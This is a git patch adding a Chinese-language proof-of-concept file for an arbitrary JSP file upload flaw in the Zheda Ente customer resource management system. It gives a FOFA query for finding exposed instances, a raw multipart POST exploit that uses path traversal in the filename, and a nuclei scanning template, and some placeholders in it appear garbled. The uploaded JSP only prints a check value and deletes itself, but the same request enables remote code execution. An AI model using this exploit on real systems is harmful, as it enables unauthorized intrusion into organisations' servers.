From 6500e39a1e92bad249b39b984914028cae034558 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 16 Jan 2024 19:11:22 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=99=E5=A4=A7=E6=81=A9=E7=89=B9?=
 =?UTF-8?q?=E5=AE=A2=E6=88=B7=E8=B5=84=E6=BA=90=E7=AE=A1=E7=90=86=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9Fcrmbasicaction=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...客户资源管理系统crmbasicaction任意文件上传.md | 90 +++++++++++++++++++
 1 file changed, 90 insertions(+)
 create mode 100644 浙大恩特客户资源管理系统crmbasicaction任意文件上传.md
diff --git a/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md b/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md
new file mode 100644
index 0000000..9325d85
--- /dev/null
+++ b/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md
@@ -0,0 +1,90 @@
+## 浙大恩特客户资源管理系统crmbasicaction任意文件上传
+
+浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
+
+## fofa
+```
+app="浙大恩特客户资源管理系统"
+```
+
+## poc
+```
+POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+Content-Length: 267
+Accept-Encoding: gzip
+Connection: close
+Content-Type: multipart/form-data; boundary=0rwysvgvy7rxv790mpju
+
+--0rwysvgvy7rxv790mpju
+Content-Disposition: form-data; name="file"; filename="../../mqh8qxe3cy.jsp"
+Content-Type: application/zip
+
+<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
+--0rwysvgvy7rxv790mpju--
+```
+
+![3a3a1bb6be6134a688029b7e4d757cd4](https://github.com/wy876/POC/assets/139549762/75ccec48-a0ad-4ca6-abd7-fdd2635ba5ef)
+
+![9f14d667e2ff13898bf0e9f6e33fe1d5](https://github.com/wy876/POC/assets/139549762/b4355528-ae24-4dfa-962b-eaa779bc6ba7)
+
+访问上传的文件
+/enterdoc/dao{{filepath}}{(unknown)}.jsp
+
+
+## nuclei
+```
+
+id: zhedaente-entsoft-CrmBasicAction-upload
+
+info:
+ name: 浙大恩特客户资源管理系统-crmbasicaction-任意文件上传
+ author: rain
+ severity: critical
+ metadata:
+ fofa-query: title="欢迎使用浙大恩特客户资源管理系统" || body="script/Ent.base.js" || app="浙大恩特客户资源管理系统"
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+ boundary: "{{to_lower(rand_base(20))}}"
+
+http:
+ - raw:
+ - |
+ POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+ Connection: close
+ Content-Type: multipart/form-data; boundary={{boundary}}
+ Accept-Encoding: gzip
+
+ --{{boundary}}
+ Content-Disposition: form-data; name="file"; filename="../../{(unknown)}.jsp"
+ Content-Type: application/zip
+
+ <% out.println(111*111);new 
java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
+ --{{boundary}}--
+
+ - |+
+ GET /enterdoc/dao{{filepath}}{(unknown)}.jsp HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+ Content-Length: 0
+ Accept-Encoding: gzip, deflate
+ Connection: close
+
+ extractors:
+ - type: regex
+ name: filepath
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - '(/\d+/)'
+
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_2 == 200 && contains(body_2,'12321')"
+```